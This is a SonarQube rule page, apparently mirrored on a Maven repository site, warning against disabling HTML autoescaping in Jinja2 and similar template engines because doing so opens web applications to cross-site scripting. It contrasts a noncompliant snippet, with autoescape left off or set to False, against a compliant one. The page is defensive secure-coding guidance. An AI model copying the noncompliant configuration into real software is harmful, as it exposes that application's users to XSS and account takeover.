All Downloads are FREE. Search and download functionalities are using the official Maven repository.

org.sonar.l10n.py.rules.python.S5439.html Maven / Gradle / Ivy

There is a newer version: 4.23.0.17664
Show newest version

This rule is deprecated; use {rule:python:S5247} instead.

Why is this an issue?

Template engines have an HTML autoescape mechanism that protects web applications against most common cross-site-scripting (XSS) vulnerabilities.

By default, it automatically replaces HTML special characters in any template variables. This secure by design configuration should not be globally disabled.

Escaping HTML from template variables prevents switching into any execution context, like <script>. Disabling autoescaping forces developers to manually escape each template variable for the application to be safe. A more pragmatic approach is to escape by default and to manually disable escaping when needed.

A successful exploitation of a cross-site-scripting vulnerability by an attacker allow him to execute malicious JavaScript code in a user’s web browser. The most severe XSS attacks involve:

  • Forced redirection
  • Modify presentation of content
  • User accounts takeover after disclosure of sensitive information like session cookies or passwords

This rule supports the following libraries:

Noncompliant code example

from jinja2 import Environment

env = Environment() # Noncompliant; New Jinja2 Environment has autoescape set to false
env = Environment(autoescape=False) # Noncompliant

Compliant solution

from jinja2 import Environment
env = Environment(autoescape=True) # Compliant

Resources





© 2015 - 2024 Weber Informatics LLC | Privacy Policy